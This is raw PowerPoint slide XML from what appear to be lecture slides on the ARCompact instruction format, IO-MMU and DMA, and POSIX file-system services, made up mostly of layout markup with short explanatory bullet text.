          <p:cNvPr id="1751050" name="AutoShape 10"/>
          <p:cNvSpPr>
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="5054600" y="3301326"/>
            <a:ext cx="1524000" cy="1123712"/>
          </a:xfrm>
          <a:prstGeom prst="wedgeRoundRectCallout">
            <a:avLst>
              <a:gd name="adj1" fmla="val -60940"/>
              <a:gd name="adj2" fmla="val -85588"/>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Flag bit signals the result of the instruction to set condition codes</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="900">
              <a:solidFill>
                <a:schemeClr val="bg2"/>
              </a:solidFill>
              <a:latin typeface="Arial" charset="0"/>
              <a:cs typeface="Arial" charset="0"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="1751051" name="AutoShape 11"/>
          <p:cNvSpPr>
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="1778000" y="3402687"/>
            <a:ext cx="1752600" cy="919401"/>
          </a:xfrm>
          <a:prstGeom prst="wedgeRoundRectCallout">
            <a:avLst>
              <a:gd name="adj1" fmla="val 4894"/>
              <a:gd name="adj2" fmla="val -8345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Mode Field identifies operand fields as register address, data, or cc</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="900">
              <a:solidFill>
                <a:schemeClr val="bg2"/>
              </a:solidFill>
              <a:latin typeface="Arial" charset="0"/>
              <a:cs typeface="Arial" charset="0"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="1751052" name="AutoShape 12"/>
          <p:cNvSpPr>
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="3454400" y="4621887"/>
            <a:ext cx="2359025" cy="919401"/>
          </a:xfrm>
          <a:prstGeom prst="wedgeRoundRectCallout">
            <a:avLst>
              <a:gd name="adj1" fmla="val -26852"/>
              <a:gd name="adj2" fmla="val -223843"/>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Identifies one of 64 available instruction slots in the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 defined by the Major Opcode</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="900">
              <a:solidFill>
                <a:schemeClr val="bg2"/>
              </a:solidFill>
              <a:latin typeface="Arial" charset="0"/>
              <a:cs typeface="Arial" charset="0"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="14349" name="Text Box 13"/>
          <p:cNvSpPr txBox="1">
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="1092200" y="1892300"/>
            <a:ext cx="7485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b="1">
                <a:latin typeface="Arial" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>ARCompact</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1600" b="1">
                <a:latin typeface="Arial" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t> 32</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" sz="1600" b="1">
                <a:latin typeface="Arial" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>-</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1600" b="1">
                <a:latin typeface="Arial" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>bit Register </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" sz="1600" b="1">
                <a:latin typeface="Arial" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>Direct </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1600" b="1">
                <a:latin typeface="Arial" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>Instruction Format (Major Opcode 0x04): </a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="14350" name="Rectangle 14"/>
          <p:cNvSpPr>
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="1016000" y="2654300"/>
            <a:ext cx="914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1" name="Text Box 15"/>
          <p:cNvSpPr txBox="1">
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="1092200" y="27305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Opcode</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="14352" name="Rectangle 16"/>
          <p:cNvSpPr>
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="5664200" y="2654300"/>
            <a:ext cx="1295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3" name="Text Box 17"/>
          <p:cNvSpPr txBox="1">
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="5892800" y="2730500"/>
            <a:ext cx="784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Source2</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="14354" name="Rectangle 18"/>
          <p:cNvSpPr>
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="7035800" y="2654300"/>
            <a:ext cx="1295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5" name="Text Box 19"/>
          <p:cNvSpPr txBox="1">
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="7188200" y="2730500"/>
            <a:ext cx="1014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Destination</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="14356" name="Rectangle 20"/>
          <p:cNvSpPr>
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="3073400" y="2654300"/>
            <a:ext cx="16002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7" name="Rectangle 21"/>
          <p:cNvSpPr>
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="4749800" y="2654300"/>
            <a:ext cx="268288"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8" name="Text Box 22"/>
          <p:cNvSpPr txBox="1">
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="4762500" y="2730500"/>
            <a:ext cx="27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F</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="14359" name="Rectangle 23"/>
          <p:cNvSpPr>
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="5103813" y="2654300"/>
            <a:ext cx="484187"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0" name="Rectangle 24"/>
          <p:cNvSpPr>
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="2006600" y="2654300"/>
            <a:ext cx="533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1" name="Rectangle 25"/>
          <p:cNvSpPr>
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="2616200" y="2654300"/>
            <a:ext cx="3810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2" name="Text Box 26"/>
          <p:cNvSpPr txBox="1">
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="2616200" y="2730500"/>
            <a:ext cx="387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US" sz="1200" b="1">
                <a:solidFill>
                  <a:schemeClr val="bg2"/>
                </a:solidFill>
                <a:latin typeface="Arial" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>M</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="14363" name="Text Box 27"/>
          <p:cNvSpPr txBox="1">
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="2006600" y="2730500"/>
            <a:ext cx="428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a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" sz="1200" b="1">
                <a:solidFill>
                  <a:schemeClr val="bg2"/>
                </a:solidFill>
                <a:latin typeface="Arial" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>rc</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="1200" b="1">
              <a:solidFill>
                <a:schemeClr val="bg2"/>
              </a:solidFill>
              <a:latin typeface="Arial" pitchFamily="34" charset="0"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="14364" name="Text Box 28"/>
          <p:cNvSpPr txBox="1">
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="3302000" y="27305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Sub-Opcode</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="14365" name="Text Box 29"/>
          <p:cNvSpPr txBox="1">
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="2768600" y="24257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22</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1000">
                <a:latin typeface="Arial" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>   </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" sz="1000">
                <a:latin typeface="Arial" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>2</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1000">
                <a:latin typeface="Arial" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>1</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="14366" name="Text Box 30"/>
          <p:cNvSpPr txBox="1">
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="5130800" y="2730500"/>
            <a:ext cx="428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a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" sz="1200" b="1">
                <a:solidFill>
                  <a:schemeClr val="bg2"/>
                </a:solidFill>
                <a:latin typeface="Arial" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>rc</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="1200" b="1">
              <a:solidFill>
                <a:schemeClr val="bg2"/>
              </a:solidFill>
              <a:latin typeface="Arial" pitchFamily="34" charset="0"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="14367" name="Text Box 31"/>
          <p:cNvSpPr txBox="1">
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="4978400" y="2425700"/>
            <a:ext cx="638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a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" sz="1000">
                <a:latin typeface="Arial" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>4</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1000">
                <a:latin typeface="Arial" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>  </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" sz="1000">
                <a:latin typeface="Arial" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>  </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1000">
                <a:latin typeface="Arial" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t> 1</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" sz="1000">
                <a:latin typeface="Arial" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>2</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="1000">
              <a:latin typeface="Arial" pitchFamily="34" charset="0"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="14368" name="Text Box 32"/>
          <p:cNvSpPr txBox="1">
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="6959600" y="2425700"/>
            <a:ext cx="145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1200150" algn="l"/>
              </a:tabLst>
              <a:defRPr sz="2000">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="Tahoma" pitchFamily="34" charset="0"/>
                <a:cs typeface="Arial" pitchFamily="34" charset="0"/>
              </a:defRPr>
            </a:lvl1pPr>
            <a:lvl2pPr marL="742950" indent="-285750" eaLnBrk="0" hangingPunct="0">
              <a:tabLst>
                <a:tab pos="1200150" algn="l"/>
              </a:tabLst>
              <a:defRPr sz="2000">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="Tahoma" pitchFamily="34" charset="0"/>
                <a:cs typeface="Arial" pitchFamily="34" charset="0"/>
              </a:defRPr>
            </a:lvl2pPr>
            <a:lvl3pPr marL="1143000" indent="-228600" eaLnBrk="0" hangingPunct="0">
              <a:tabLst>
                <a:tab pos="1200150" algn="l"/>
              </a:tabLst>
              <a:defRPr sz="2000">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="Tahoma" pitchFamily="34" charset="0"/>
                <a:cs typeface="Arial" pitchFamily="34" charset="0"/>
              </a:defRPr>
            </a:lvl3pPr>
            <a:lvl4pPr marL="1600200" indent="-228600" eaLnBrk="0" hangingPunct="0">
              <a:tabLst>
                <a:tab pos="1200150" algn="l"/>
              </a:tabLst>
              <a:defRPr sz="2000">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="Tahoma" pitchFamily="34" charset="0"/>
                <a:cs typeface="Arial" pitchFamily="34" charset="0"/>
              </a:defRPr>
            </a:lvl4pPr>
            <a:lvl5pPr marL="2057400" indent="-228600" eaLnBrk="0" hangingPunct="0">
              <a:tabLst>
                <a:tab pos="1200150" algn="l"/>
              </a:tabLst>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9pPr>
          </a:lstStyle>
          <a:p>
            <a:r>
              <a:rPr lang="en-GB" sz="1000">
                <a:latin typeface="Arial" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>5</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1000">
                <a:latin typeface="Arial" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>  </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" sz="1000">
                <a:latin typeface="Arial" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>	0</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="1000">
              <a:latin typeface="Arial" pitchFamily="34" charset="0"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="235035464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IO-MMU</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hardware devices perform </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="1" i="1" dirty="0" smtClean="0"/>
              <a:t>DMA – Direct Memory Access</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>The device driver programs the device with the physical addresses it needs to read/write</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>An IO-MMU allows controlling which addresses a given device can access</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Important in a  virtualization environment, IO-MMU controlled by the </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="1" i="1" dirty="0" smtClean="0"/>
              <a:t>VMM </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>(</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0" smtClean="0"/>
              <a:t>VT-d</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>)</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Also important in a microkernel based architecture</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="1121979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File </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Systems</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="52731747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an application wants to </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="1" i="1" dirty="0" smtClean="0"/>
              <a:t>access </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>a file, the file system should be able to map the file </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="1" i="1" dirty="0" smtClean="0"/>
              <a:t>name, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>and </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="1" i="1" dirty="0" smtClean="0"/>
              <a:t>resolve</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t> it to the actual file location</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" b="1" i="1" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>The file system should </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="1" i="1" dirty="0" smtClean="0"/>
              <a:t>check </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>that the application has </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="1" i="1" dirty="0" smtClean="0"/>
              <a:t>access</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t> to that file</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Then, the application should be able to </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="1" i="1" dirty="0" smtClean="0"/>
              <a:t>perform operations </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>on that file (</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="1" i="1" dirty="0" smtClean="0"/>
              <a:t>read, write, etc.</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>)</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0" smtClean="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Finally, if the application </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="1" i="1" dirty="0" smtClean="0"/>
              <a:t>terminates</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t> (normally or abnormally), the file system should </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="1" i="1" dirty="0" smtClean="0"/>
              <a:t>cleanup</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t> all state that it kept for that application on that file</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="80468591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 Drivers and OS Services</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="Content Placeholder 2"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit fontScale="92500" lnSpcReduction="20000"/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>When an application wants to </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="1" i="1" dirty="0" smtClean="0"/>
              <a:t>access </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>a plug-in OS service, the file system should be able to map the service </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="1" i="1" dirty="0" smtClean="0"/>
              <a:t>name, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>and </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="1" i="1" dirty="0" smtClean="0"/>
              <a:t>resolve</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t> it to the actual service</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" b="1" i="1" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>The file system should </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="1" i="1" dirty="0" smtClean="0"/>
              <a:t>check </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>that the application has </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="1" i="1" dirty="0" smtClean="0"/>
              <a:t>access</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t> to that service</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Then, the application should be able to </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="1" i="1" dirty="0" smtClean="0"/>
              <a:t>perform operations </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>on that service (</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="1" i="1" dirty="0" smtClean="0"/>
              <a:t>read, write, etc.</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>)</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0" smtClean="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Finally, if the application </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="1" i="1" dirty="0" smtClean="0"/>
              <a:t>terminates</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t> (normally or abnormally), the file system should </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="1" i="1" dirty="0" smtClean="0"/>
              <a:t>cleanup</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t> all state that it kept for that application on that service</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="4574630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POSIX File System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POSIX file system therefore acts both a as a file system and as a </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="1" i="1" dirty="0" smtClean="0"/>
              <a:t>driver/service model</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>File system properties:</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Hierarchical file naming, access through absolute and relative paths</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" b="1" i="1" dirty="0" smtClean="0"/>
              <a:t>access control</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t> to files</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" b="1" i="1" dirty="0" smtClean="0"/>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" b="1" i="1" dirty="0" smtClean="0"/>
              <a:t>special files</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t> (character and block devices), with </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0" smtClean="0"/>
              <a:t>read, write</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t> and </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1" smtClean="0"/>
              <a:t>ioctl</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t> operations</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" b="1" i="1" dirty="0" smtClean="0"/>
              <a:t>Anonymous </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>and</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="1" i="1" dirty="0" smtClean="0"/>
              <a:t> named pipes, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>as well as </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="1" i="1" dirty="0" smtClean="0"/>
              <a:t>sockets</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" b="1" i="1" dirty="0" smtClean="0"/>
              <a:t>select </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>to wait for events on multiple file descriptors</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" b="1" i="1" dirty="0" smtClean="0"/>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Dynamic</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="1" i="1" dirty="0" smtClean="0"/>
              <a:t> mounting </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>of file systems, quota management</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" b="1" i="1" dirty="0" smtClean="0"/>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" b="1" i="1" dirty="0" smtClean="0"/>
              <a:t>symbolic </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>and </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="1" i="1" dirty="0" smtClean="0"/>
              <a:t>hard links</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
